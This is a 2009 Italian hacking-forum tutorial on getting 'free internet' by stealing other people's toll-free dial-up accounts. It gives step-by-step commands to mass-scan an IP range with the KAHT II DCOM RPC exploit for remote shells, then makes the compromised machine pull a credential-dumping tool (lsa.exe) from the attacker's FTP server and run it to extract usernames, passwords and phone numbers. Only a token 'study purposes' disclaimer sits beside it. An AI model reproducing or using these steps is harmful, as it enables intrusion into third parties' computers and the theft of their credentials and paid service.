Futuri aggiornamenti!!: Come avrete visto il sito � stato defacciato quindi data la poka sicurezza del CMS provveder� a cambiare interamente cms e a sistemare + la sicurezza
Inviato: Gio Gen 15, 2009 9:33 pm Oggetto: Avere Internet Gratis [solo per modem a 56Kb]
[Premessa]
Eccoci giunti ad uno dei tutorials più richiesti, la ricerca di
account per collegarsi gratis ad internet. Quel che verrÃÂ
spiegato in seguito, vale solo per utenti possedenti un modem
56k, 64k, 128k (64k*2). Ma perchè gratis? Il trucco sta nel
semplice fatto che, utilizzando questo metodo, troveremo
degli account (nome utente, password e numero di telefono) di
utenti che, registrandosi e pagando una quota mensile,
usufruiscono di un collegamento illimitato, 24 ore su 24. Il
tutto è gratis perchè, gli utenti che pagano questa quota, per
collegarsi, utilizzano un numero verde!! La stessa cosa NON
vale se noi vogliamo ad esempio collegarci con l'account di un
nostro amico che ad esempio usa Libero come provider. Perchè?
perchè il numero di telefono che lui usa è un numero urbano!
Quindi se noi proviamo a collegarci con il suo account
pagheremo lo scatto urbano. Noi quindi dovremo trovare account
di utenti che usufruiscono di un servizio con numero verde.
Questo tutorial è stato creato SOLO ed ESCLUSIVAMENTE a scopo
di studio e informazione. L'autore declina qualsiasi
responsabilitàin caso di danni recati a terzi.
E' bene sapere come in molti vengono "fregati" con questo
antico ma banale ed efficace sistema..
___ _ _ ____ ___ ____ _____
|_ _| | | _ _ _/ ___| ____|
| || | | | | | | | | _|
| || | | |_| | | |___| |___
|___|_| _|____/_______|_____|
1. Requisiti & tools
2. Tecnica di attacco
3. Informazioni
[Requisiti]
* Un vostro ftp personale.
- E' indispensabile possedere un ftp personale, in modo da
poter copiare dei files importanti sul computer da cui
dovrete prelevare l'account.
- Questo programma fa una scansione su una determinata classe
di ip (ad esempio, dall'ip 57.66.0.0 all'ip 57.66.255.255)
per poi sfruttare un famoso bug (Rpc) in modo da entrare
nel pc vulnerabile.
- Tool che permette di trovare il nome utente, password e
numero di telefono di un qualsiasi account presente nel
sistema.
[Buon Lavoro]
1* Cominciate a decomprimere unrar.zip, fatto questo mettete nel
vostro ftp, lsa.rar e unrar.exe.
2* Decomprimete sul vostro pc kaht.zip.
3* Aprite il Prompt di Ms-Dos e posizionatevi nella directory
dove avete decompresso kaht.zip.
Es: c:documents and settingsadministratordesktopkaht
4* Cominciamo a fare uno scan di una classe di ip (scanneremo
ad esempio la classe 57.66.*.*). Siccome un ip è un'insieme
di quattro classi che vanno da 0 a 255
(da 0.0.0.0 a 255.255.255.255) dovremo scannare da 57.66.0.0
a 57.66.255.255. Quindi questo è ciò che scriveremo nel
Prompt di Ms-Dos una volta che siamo dentro la directory ove
è presente Kaht:
Kaht.exe 57.66.0.0 57.66.255.255
Kaht cominceràa scannare e quindi la risposta sarà:
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by [email protected]
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? smile.gif - AUTOHACKING
________________________________________________
[+] Targets: 57.66.0.0-57.66.255.255 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 40115
[+] Scan In Progress...
Ciò significa che lo scan è cominciato.. buona fortuna!
ATTENZIONE!! I ranges che dovremo scannare, saranno solo
quelli appartenenti a provider che forniscono servizio
a numero verde!! Alla fine del tutorial ne ho specificato
qualcuno..
5* Attendiamo fin quando Kaht troveràqualche pc vulnerabile.
Riconosceremo che il nostro scanner ha trovato qualcosa
quando ci diràqualcosa del tipo:
6* A questo punto siamo dentro il computer in cui risiede la
flat da recuperare. Il prossimo passo da compiere consiste
nell'elencare dentro un file .txt tutti i procedimenti che
facciamo quando ci colleghiamo ad un ftp (da Ms-Dos) e
scarichiamo. Queste saranno le stringhe da eseguire:
echo open ftp.xxx.it>>login.txt
echo pippo>>login.txt
echo lol>>login.txt
echo binary>>login.txt
echo get unrar.exe>>login.txt
echo get lsa.rar>>login.txt
echo bye>>login.txt
Tutte queste righe servono a mettere in un file chiamato
login.txt tutto ciò che c'è c'è tra la parola echo e i segni
>>. Ad esempio se noi scriveremo:
echo il mio nome è mai più>>nome.txt
si genereràun file chiamato nome.txt ed all'interno la riga
"il mio nome è mai più".
Qui sotto spiego le varie stringhe utilizzate:
La prima riga fa aprire l'ftp privato (ftp.xxx.it).
La seconda riga manda il nome utente all'ftp (pippo).
La terza riga manda la password all'ftp (lol).
La quarta riga imposta il tipo di trasferimento dei files
in modalitàbinaria.
La quinta e la sesta riga dicono all'ftp di scaricare
sulla shell i files unrar.exe e lsa.rar
La sesta riga chiude l'ftp.
Non ci resta che scrivere:
ftp -s:login.txt
per cominciare ad eseguire tutti i comandi contenuti nel file
login.txt
7* Attendete qualche istante, giusto il tempo che la shell copi
i files dall'ftp.
Non ci resta che decomprimere il file lsa.rar con il seguente
comando:
unrar.exe e lsa.rar
Perfetto, il file lsa.rar è stato decompresso.
8* Ora dobbiamo semplicemente eseguire lsa.exe per trovare la
flat:
lsa.exe >> flat.txt
Con questo comando non abbiamo fatto altro che eseguire
lsa.exe, e copiare tutto quel che questo file ha svolto, nel
file flat.txt.
9* L'ultimo passo da compiere, è leggere il file flat.txt, che
conterràil nostro nuovo account per collegarci gratis!
Lo leggeremo scrivendo il seguente comando:
Le flat utilizzabili con i cellulari forniti di modem sono
Equant, UU.net e PrServ. Le flat di tipo PrServ funzionano con il
cel con il secondo numero ed han bisogno di dns primario e
dns secondario, ecco qui una serie di dns:
Non puoi inserire nuovi Topic in questo forum Non puoi rispondere ai Topic in questo forum Non puoi modificare i tuoi messaggi in questo forum Non puoi cancellare i tuoi messaggi in questo forum Non puoi votare nei sondaggi in questo forum
CoPyRiGhT 2009 By
KinG-InFeT PhpBB Copiright
2009
Tutti I Diritti Riservati